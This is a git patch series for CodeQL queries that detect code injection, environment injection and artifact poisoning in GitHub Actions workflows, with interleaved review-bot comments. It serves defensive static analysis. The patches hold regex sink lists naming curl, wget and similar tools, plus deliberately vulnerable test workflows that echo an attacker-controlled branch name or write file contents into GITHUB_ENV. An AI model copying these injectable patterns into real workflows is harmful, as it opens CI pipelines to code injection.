@@ -255,10 +255,13 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { BashCommentVsHeadDateCheck() { - exists(string line | - line = this.getScript().splitAt("\n") and - line.toLowerCase() - .regexpMatch(".*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*") + // eg: if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + exists(string cmd1, string cmd2 | + cmd1 = this.getACommand() and + cmd2 = this.getACommand() and + not cmd1 = cmd2 and + cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") and + cmd2.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") ) } } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 40c0c7da9eb..923d950631d 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -37,11 +37,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 4f54f38f274..6f325ca4c93 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
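Review bot: The rewritten characteristic predicate of `BashCommentVsHeadDateCheck` accepts any two different `date -d` commands that mention one of the four `*_at` names. A step containing `date -d "$pushed_at"` and `date -d "$commit_at"` therefore counts as a comment-versus-head-date check even though no comment timestamp is involved. The removed version required both calls on one line, while the new one lets them sit anywhere in the step. This class appears to be a control check (inferred from the file name), so an over-broad match would suppress findings. Tying each side to its role closes that gap and makes `not cmd1 = cmd2` unnecessary: `cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed)_at.*")` and `cmd2.toLowerCase().regexpMatch("date\\s+-d.*(comment|commented)_at.*")`.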
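Review bot: `run.getAnAssignment(var_name, var_value)` replaces the per-line capture in `EnvPathInjectionFromFileReadSink`, but nothing in the hunk says what `var_value` holds when the right-hand side is a command substitution, which is the `FOO=$(cat test-results/sha-number)` case in the comment above it. The parser test output later in this patch series prints substitutions inside the enclosing command as `SUBCOMMAND`; if assignments are normalised the same way, `outputsPartialFileContent(var_value)` would no longer see the `cat` and the sink would stop reporting. That is an inference, since `getAnAssignment` is defined outside the hunk, so a regression test for this pattern and a comment such as `// var_value is the raw right-hand side, command substitutions included` would settle it. The same replacement is made in the EnvVarInjectionQuery.qll and OutputClobberingQuery.qll hunks, and the `exists` body continues past the end of each hunk.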
@@ -42,11 +42,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 38a8d2b9d0b..4a488f945b9 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -56,11 +56,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") @@ -154,11 +151,11 @@ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { // A file is read and its content is printed to stdout // - run: echo "foo=$( Date: Wed, 2 Oct 2024 12:34:01 +0200 Subject: [PATCH 0559/1267] Add new Argument Injection sinks --- ql/lib/ext/config/argument_injection_sinks.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) 
diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index ab523c59303..95f81313168 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -5,12 +5,12 @@ extensions: # https://gtfobins.github.io/ # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - - ["(awk)(.*?)", 2, 3] - - ["(curl)(.*?)", 2, 3] - - ["(find)(.*?)", 2, 3] - - ["(git)(.*?)", 2, 3] - - ["(sed)(.*?)", 2, 3] - - ["(tar)(.*?)", 2, 3] - - ["(wget)(.*?)", 2, 3] - - ["(zip)(.*?)", 2, 3] + - ["(awk)\\s(.*?)", 2, 3] + - ["(curl)\\s(.*?)", 2, 3] + - ["(find)\\s(.*?)", 2, 3] + - ["(git)\\s(.*?)", 2, 3] + - ["(sed)\\s(.*?)", 2, 3] + - ["(tar)\\s(.*?)", 2, 3] + - ["(wget)\\s(.*?)", 2, 3] + - ["(zip)\\s(.*?)", 2, 3] From 805269683617f8d168234e1f8b646aa432b0830b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:34:10 +0200 Subject: [PATCH 0560/1267] Add new Poisonable step for bun --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index f79ca795cd0..1543e2d8d45 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -19,6 +19,7 @@ extensions: - ["asv"] - ["awk\\s+-f"] - ["bundle"] + - ["bun"] - ["cargo"] - ["checkov"] - ["eslint"] From 6b98a5b5b16266c360b5116e80d7afce07f60e03 Mon Sep 17 00:00:00 2001 
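Review bot: The commit subject says new argument-injection sinks are added, but the argument_injection_sinks.yml hunk only tightens the eight existing patterns by inserting `\s` between the command name and its arguments; the subject or a comment in the file should say so. A comment above `data:` such as `# \s after the name keeps "git" from matching longer command names that merely start with it` would record why the separator is required. If these patterns are matched against the whole command string (not visible here), invocations through a path or a wrapper, for example `/usr/bin/tar` or `sudo tar`, are not covered either before or after this change, which is worth a test case.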
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:34:27 +0200 Subject: [PATCH 0561/1267] Update tests --- .../.github/workflows/workflow_run_branches5.yml | 13 +++++++++++++ .../Security/CWE-094/CodeInjectionCritical.expected | 3 ++- .../Security/CWE-094/CodeInjectionMedium.expected | 2 ++ .../.github/workflows/artifactpoisoning52.yml | 3 +-- .../.github/workflows/artifactpoisoning53.yml | 2 +- .../CWE-829/ArtifactPoisoningCritical.expected | 12 ++++++------ .../CWE-829/ArtifactPoisoningMedium.expected | 8 ++++---- .../CWE-829/UntrustedCheckoutCritical.expected | 2 +- 8 files changed, 30 insertions(+), 15 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml new file mode 100644 index 00000000000..5e391db21aa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml @@ -0,0 +1,13 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + branches-ignore: ["foo"] + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 207fb3abf01..61c851a2cfa 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -447,6 +447,7 @@ nodes | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | 
@@ -566,4 +567,4 @@ subpaths | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e5ad4688852..db8e7b485d7 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -447,6 +447,7 @@ nodes | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | 
@@ -490,3 +491,4 @@ subpaths | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml index 130668b8515..e4845a6f2f1 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml @@ -18,8 +18,7 @@ jobs: - name: Env Var Injection run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" - ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" - ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" echo "EOF" >> "${GITHUB_ENV}" diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml index 7c255e7722d..67209267b5c 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml @@ -18,7 +18,7 @@ jobs: - run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 74edee72f5f..985af04112a 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -13,8 +13,8 @@ edges | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | 
@@ -44,9 +44,9 @@ nodes | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | 
@@ -67,8 +67,8 @@ subpaths | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 079a89a498c..e1532c06cdc 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -13,8 +13,8 @@ edges | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance 